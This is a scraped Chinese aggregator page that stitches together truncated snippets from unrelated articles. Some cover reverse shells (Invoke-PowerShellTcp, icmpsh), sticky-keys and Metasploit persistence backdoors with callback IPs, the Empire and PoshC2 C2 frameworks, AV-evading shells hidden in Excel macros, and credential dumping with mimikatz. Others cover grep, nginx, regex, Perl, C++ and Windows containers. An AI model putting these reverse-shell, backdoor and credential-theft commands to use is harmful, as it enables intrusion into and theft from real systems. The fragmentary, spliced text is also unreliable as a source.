0x02:Powershell反弹shell Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...的函数,使用方法类似Netcat。...正向连接或者反向连接shell,其参数如下: - IPAddress 反向连接时设置的IP - Port 正向连接时设置的端口,前面要写上-Bind参数 - Reverse 反向连接 - Bind 正向连接...反向连接:Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.4 -port 9999 ?...上述测试是反向连接,那么正向连接的时候,在攻击者的电脑上运行的命令为: nc -nvu 192.168.1.24 4555 ?
设置 font-face 和主题 z.lua lua 安装 z.lua 下载 z.lua 在 Powershell 设置 使用方法 快速打开 Windows Terminal Alias...powershell) -join "`n") 使用方法 https://github.com/skywind3000/z.lua/blob/master/README.cn.md z foo...并且权重最高的路径 z -r foo # 跳转到包含 foo 并且访问次数最高的路径 z -t foo # 跳转到包含 foo 并且最近访问过的路径 z -l foo # 不跳转,只是列出所有匹配...foo 的路径 z -c foo # 跳转到包含 foo 并且是当前路径的子路径的权重最高的路径 z -e foo # 不跳转,只是打印出匹配 foo 并且权重最高的路径 z -i foo...function gitupdate { git add --all; git commit -m "Update"; git push; } # 还可以使用参数等扩展用法 # 使用方法
二、shift后门 原理:将按5下shift时调用的“粘滞键”替换为“CMD” 将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不 删除就会自动变回去...六、Powershell权限维持 参考此PowerShell脚本 https://github.com/re4lity/Schtasks-Backdoor 利用代码: powershell.exe-exec...Persistence模块 前提是利用MSF获取到了对方的会话 run persistence -U -i 12 -p 6666 -r 192.168.124.14 说明 -i 目标自动回连时间 -p 设置目标反向连接的端口...-r 设置目标反向连接的ip地址 -U 设置目标自启动 加入自启动后,就算受害者机器再次启动也能弹回shell 2、metsvc 模块 前提是利用MSF获取到了对方的会话 run metsvc...-A 说明: -A 自动启动一个匹配的 multi/handler 以连接到该服务 该模块是在受害者服务器开启了一个“Meterpreter”服务 下次攻击者可以利用metsvc_bind_tcp
目前最新版本可以到的是2.3包含282个模块,和之前的,2.x之后有些使用方法以及命令都有了很大的区别,官网也没有给出更新介绍使用。 ? 输入help查看Empire使用帮助信息 ?...使用方法跟Meterpreter原理是一样的,先设置一个监听,这里要注意了,输入”listeners”它提示说没有建立监听, 输入uselistener空格按下Tab键可以看到有7种模式 ?...同样的msf也需要设置,通过https的方式反向连接,在网速慢的情况下不稳定,如果反弹没有收到数据,可以将监听端口换成443就可以收到Empire反弹回来的shell了如下。...2.schtasks 同样的选择schtasks模块设置下监听名就行,这里还需要设置下DailyTime时间如果不设置默认的是每天早上的9点 (Empire: DCBL4SUF) > usemodule...,回来借朋友的电脑重新安装环境,还有些模块功能没写,花了几天时间写到这眼都花了,由于没有域环境,文章中只是介绍了Empirer大致的基本用法,大量的模块都集成在usemodule下,主要还是在于引导,使用方法多用多练就好
其使用方法如下所示: /\Abarney/ #匹配字符串绝对开头位置的barney /fred\z/ #匹配字符串绝对末尾位置的fred /fred\Z/ #匹配行尾也即换行符前的...正则表达式一般将变量放在括号内(这是和反向引用类似的),例如下面一段类似于grep工具命令的小程序: my $what = ; chomp $what; while () { if...$what可以是任何值,甚至是正则表达式元字符,如下所示: ⑸捕获变量 在上一小节正则表达式的模式分组中,我们知道圆括号通常会触发正则表达式捕获相匹配的字符串以供反向引用。...事实上,Perl会自动将这些圆括号内的捕获组储存在称为捕获变量的标量变量里面,其变量名与反向引用的编号一样都是数字,其命名与捕获组编号相同,也即$1、$2…。...同理,在正则表达式里的反向引用可以使用\g{label}或者\k{label}。
文章前言 可以发现的是有不少渗透测试工具都是用PowerShell编写的,特别是对于红队团队的活动,因为大多数现代Windows都有PowerShell,而且管理员通常不会限制普通用户访问PowerShell...控制台,这给攻击者带来了很大的好处,特别是在蓝队不监视PowerShell使用情况下 PoshC2 工具介绍 来自Nettitude Labs和Dave Hardy的Ben Turner创建了一个基于PowerShell...目标上线 之后将生产的恶意后门文件上传到目标主机或者通过主机上自带的下载工具下载恶意文件之后执行时会 ,下面以powershell为例做演示: ? 之后攻击主机上出现目标显示 ?...之后我们输入可用的会话编号,这里我们只有一个会话,所以直接输入1即可,之后会返回一个Powershell终端: ?...同时终端通过输入空格或关键指令的首字母可以进行模糊匹配,PoshC2提供的模块可以说是超级超级多: ? ? 同时终端也提供查询关键模块的使用方法: ? 例如查看IP地址: ? 是不是很好奇?
b是一个引用,但并非一个对象,同时引用的类型都要和对象的类型严格匹配(在具有继承关系的类中是例外,这里不展开),因此有下面的操作: int a = 1024; int &b = a; int &c =...,e为常量引用,只要能够转换成引用的类型,可以使用任何表达式作为初始值 double f = 1.024; int &g = f; //非法,类型不匹配 而对引用赋值,实际上是将值赋给了与引用绑定的对象...同样的,它也要求指针的类型和指向的类型严格匹配。...引用和指针比较 引用不可为空,而指针可以 例如: int &a; //非法,必须被初始化 int *p;//合法,但如果是非静态的指针变量,将拥有一个不确定的值 声明一个指针变量而不初始化是合法的,但是不建议这么做...而引用作为参数时,实际上传递的对象本身,但又不需要拷贝,因为引用绑定的就是对象。 总结 从前面的内容来看,除了使用方法的差异意外,引用似乎像是弱化版的指针,是不是有点像指针常量呢?
如果要使用windows容器,建议使用≥server2019系统(请注意,windows容器是纯命令行的那种,不太好用,一般人不建议使用)。...2、Windows云服务器不支持linux容器(LCOW ),只支持windows容器(Windowsfilter ),windows容器的使用如下 首先是镜像拉取,拉取的镜像代号指定错了或不匹配host...os(服务器自身操作系统)会报错:指定的镜像tag不存在、 镜像不兼容本地系统。...3个里面没有2016能用的) 10.0.14393是Server2016(1607)的版号,14393后面的小版本号没列不影响,选的时候就看大版本号能对得上本地系统就行 10.0.17763是Server2019...(1809)的版号,17763后面的小版本号没列不影响,选的时候就看大版本号能对得上本地系统就行 ①Windows 容器版本兼容性: 不是什么镜像拉下来都能用的,拉之前先看兼容性列表 ②Windows
-v(--invert-match):只输出不匹配的行。 -r(--recursive):递归搜索子目录。 -l(--files-with-matches):只显示包含匹配结果的文件名。...输出不匹配的行: grep -v "pattern" filename 以上命令将输出在指定文件中不匹配模式的行。 6....匹配整个单词: grep -w "pattern" filename 以上命令将仅匹配整个单词,而不是部分匹配。 8....利用反向引用匹配重复的字符: grep "\(abc\).*\1" filename 四、结论: grep命令是Linux系统中一个强大而灵活的文本搜索工具,通过使用正则表达式,它可以实现复杂的模式匹配操作...本文详细介绍了grep命令的基本语法和常用选项,以及正则表达式的使用方法。通过掌握grep命令的用法,你可以更高效地在文本文件中查找和处理需要的信息,提高工作效率。
Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。...sudo apt install powershell-empire 启动服务端 这个和我们之前讲过的cs一样。有客户端和服务端。...我们先来启动Empire powershell服务端 powershell-empire server 启动Empire powershell 客户端 powershell-empire client...牛刀小试 Empire的使用方法与msf的方法相同,先设置监听,生成木马,然后监听反弹代理。...---- 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/3704.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
在这篇文章中,我将跟大家分享如何利用C#和C++来开发反病毒产品无法检测到的反向Shell。 ? 简单的C#反向Shell GitHub上有很多能够通过cmd.exe打开反向Shell的C#代码样本。...通过PowerShell和实时编译C#开启反向Shell 这都很简单,直接把文件交给Microsoft.Workflow.Compiler.exe来编译,那我们为什么不用PowerShell来实现呢?...PowerShell命令:【点我获取】 REV.txt代码:【点我获取】 Rev.Shell代码:【点我获取】 ?...通过Excel宏、PowerShell和C#实时编译开启反向Shell 现在,我想尝试把之前的PowerShell代码注入到宏文件中,你猜怎么着?...这个Excel文件并不会被检测为恶意文件,而且能够在不触发任何警报的情况下打开反向Shell。 ? ? ? VirusTotal检测结果 ?
如何实现路由转发(反向代理) 如何修改请求的路径(如请求的是 a/index.html 改为 a/public/index.html) I. location匹配规则 1....PartOne: [=|~|~*|^~|@] = : 表示精确匹配后面的url ~ : 表示正则匹配,但是区分大小写 ~* : 正则匹配,不区分大小写 ^~ : 表示普通字符匹配,如果该选项匹配,只匹配该选项...: 匹配单个字符c [a-z] : 匹配a-z小写字母的任意一个 小括号()之间匹配的内容,可以在后面通过$1来引用,$2表示的是前面第二个()里的内容。...路径匹配规则 = : 表示精确匹配后面的url ~ : 表示正则匹配,但是区分大小写 ~* : 正则匹配,不区分大小写 ^~ : 表示普通字符匹配,如果该选项匹配,只匹配该选项,不匹配别的选项,一般用来匹配目录...路由转发 通过 proxy_pass 可以实现反向代理 通过 rewrite 可以实现路由转发 IV. 参考 location匹配顺序 nginx 常见正则匹配符号表示 V.
Bash和PowerShell:虽然,更现代的devops工具使用起来是方便,但总有一天它会停止工作。...所以,对于要编写一个重启脚本,从一个退出命令中获取错误码,或者在一个循环中做一些事情,Bash(在Linux,许多Unixes,MacOS和Windows 10中)和Microsoft的PowerShell...另外,增加一个像grep(PowerShell中等效的工具是Select-String)这样的工具,这两个工具的功能会变得更强大。 MongoDB:你至少需要知道一个文档数据库的使用方法。...如果你要使用像Apache Solr(它是基于文档的)那样的索引,或者你平时经常使用纵列数据库,那么MongoDB的使用技能对你来说就非常有用。...在PowerShell中,可以用Invoke-RestMethod这个工具代替(尽管像PowerShell一样,它需要打更多的打字)。
攻击者可以利用命令行得到比回复更多的ICMP请求,在通常情况下,每个ping命令都有相对应的回复与请求 在一些内部网络环境中,大部分系统都位于防火墙和公司代理之后以便控制入站和出站Internet流量,防火墙可以阻止反向并绑定...否则shell的运行会不稳定(表现为一直刷屏,无法进行交互输入): sysctl -w net.ipv4.icmp_echo_ignore_all=1 之后我们在终端执行以下命令来查看icmpsh的使用方法...: python icmpsh_m.py -h 之后根据脚本使用方法在终端执行以下命令: python icmpsh_m.py 192.168.188.129 192.168.188.128 之后在边界...版本 Nishang框架 Nishang框架包含了一个PowerShell模块,可以与icmpsh的python脚本结合使用,以获得ICMP上的shell Powershell使用 在攻击主机上执行以下命令将等待任何传入的...www.yourserver.com -t www.yourserver.com:4455 Icmptunnel 工具介绍 ICMPTunnel是一个使用python编写的简易脚本,该工具主要用于创建一个反向的
与sam数据库C:\Windows\System32\config(%SystemRoot%\system32\config\sam)中该用户的哈希比对 匹配则登陆成功,不匹配则登陆失败本地认证中用来处理用户输入密码的进程为...Windows 凭证获取 使用powershell脚本 powershell脚本:[1] https://raw.githubusercontent.com/samratashok/nishang/master...远程脚本下载地址[6]: https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1[7]使用方法...我们可以使用help kiwi查看msf中的猕猴桃使用方法 其中最常用的有creds_all:获取所有收集到的凭证 lsa_dump_sam:获取用户凭证,kiwi_cmd:这个命令后面可以跟着猕猴桃原生命令进行执行...使用方便 内存加载 Pwddump7 和powershell脚本类似 内存加载 Procdump 微软官方工具 无落地 注册表 系统内置 无落地 LaZagne 功能强大 文件落地 msf 功能强大
,常用 windows/meterpreter/reverse_http #通过监听80端口反向连接 windows/meterpreter/reverse_https #通过监听443端口反向连接...如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。...如果不设置的话,MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征) Payload攻击载荷模块 攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码,成功渗透目标后...这个命令的使用方法如下: execute 参数 -f 可执行文件 运行后它将执行所指定的命令。...#加载powershell功能 powershell_import /root/PowerView.ps1 #导入powershell脚本,提前将该powershell脚本放到指定目录 powershell_execute
pattern) 执行反向预测先行搜索的子表达式,匹配不处于匹配 pattern 的字符串的起始点的字符串。 x|y 匹配 x 或 y。 例:’z|food’ 匹配”z”或”food”。'...例:”[^a-z]”匹配除a-z以外的字符。 \b 匹配边界字符。 例:”er\b”匹配边界上的”er”,不匹配”verb”中间的”er”。 \B 不匹配边界字符。...例:”\x41″匹配”A”。”\x041″与”\x04″&”1″等效。允许在正则表达式中使用 ASCII 代码。 \num 匹配 num,此处的 num 是一个正整数。到捕获匹配的反向引用。....)\1″匹配两个连续的相同字符。 \n 标识一个八进制转义码或反向引用。如果 \n 前面至少有 n 个捕获子表达式,那么 n 是反向引用。...\nm 标识一个八进制转义码或反向引用。如果 \nm 前面至少有 nm 个捕获子表达式,那么 nm 是反向引用。如果 \nm 前面至少有 n 个捕获,则 n 是反向引用,后面跟有字符 m。
pattern)执行反向预测先行搜索的子表达式,该表达式匹配不处于匹配 pattern 的字符串的起始点的搜索字符串。它是一个非捕获匹配,即不能捕获供以后使用的匹配。。...\num匹配 num,此处的 num 是一个正整数。到捕获匹配的反向引用。\n标识一个八进制转义码或反向引用。如果 \n 前面至少有 n 个捕获子表达式,那么 n 是反向引用。...pattern) 执行反向预测先行搜索的子表达式,该表达式匹配不处于匹配 pattern 的字符串的起始点的搜索字符串。它是一个非捕获匹配,即不能捕获供以后使用的匹配。。...\num 匹配 num,此处的 num 是一个正整数。到捕获匹配的反向引用。 \n 标识一个八进制转义码或反向引用。如果 \n 前面至少有 n 个捕获子表达式,那么 n 是反向引用。...pattern) 执行反向预测先行搜索的子表达式,该表达式匹配不处于匹配 pattern 的字符串的起始点的搜索字符串。它是一个非捕获匹配,即不能捕获供以后使用的匹配。。
以下是基本的语法表: 字符 说明 \ 将下一字符标记为特殊字符、文本、反向引用或八进制转义符。 比如,“n”匹配字符“n”。“\n”匹配换行符。序列“\\”匹配“\”。“\(”匹配“(”。...pattern) 运行反向预測先行搜索的子表达式,该表达式匹配不处于匹配 pattern 的字符串的起始点的搜索字符串。它是一个非捕获匹配,即不能捕获供以后使用的匹配。 比如,’Windows (?!...\num 匹配 num,此处的 num 是一个正整数。 到捕获匹配的反向引用。比如,“(.)\1”匹配两个连续的同样字符。 \n 标识一个八进制转义码或反向引用。...假设 \n 前面至少有 n 个捕获子表达式,那么 n 是反向引用。 否则,假设 n 是八进制数 (0-7),那么 n 是八进制转义码。 \nm 标识一个八进制转义码或反向引用。...假设 \nm 前面至少有 nm 个捕获子表达式,那么 nm 是反向引用。假设 \nm 前面至少有 n 个捕获,则 n 是反向引用。后面跟有字符 m。假设两种前面的情况都不存在。
2、反向引用前面()内捕获的内容: 通过组号反向引用 每一个没有使用?...:的小括号都会分配一个组好,从1开始,从左到右递增,可以通过\i引用前面()内表达式捕获的内容 通过组名反向引用前面小括号内捕获的内容 可以通过在左括号后面跟随?...P=name)来引用前面捕获的内容。如(? P\w+)\s+(?P=word)来匹配重复的单词。 注意点: 反向引用不能放在字符类[]中使用。...(六) 正则表达式的标志 正则表达式的标志有两种使用方法 通过给compile方法传入标志参数,多个标志使用|分割的方法,如re.compile(r"#[\da-f]{6}\b", re.IGNORECASE...本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
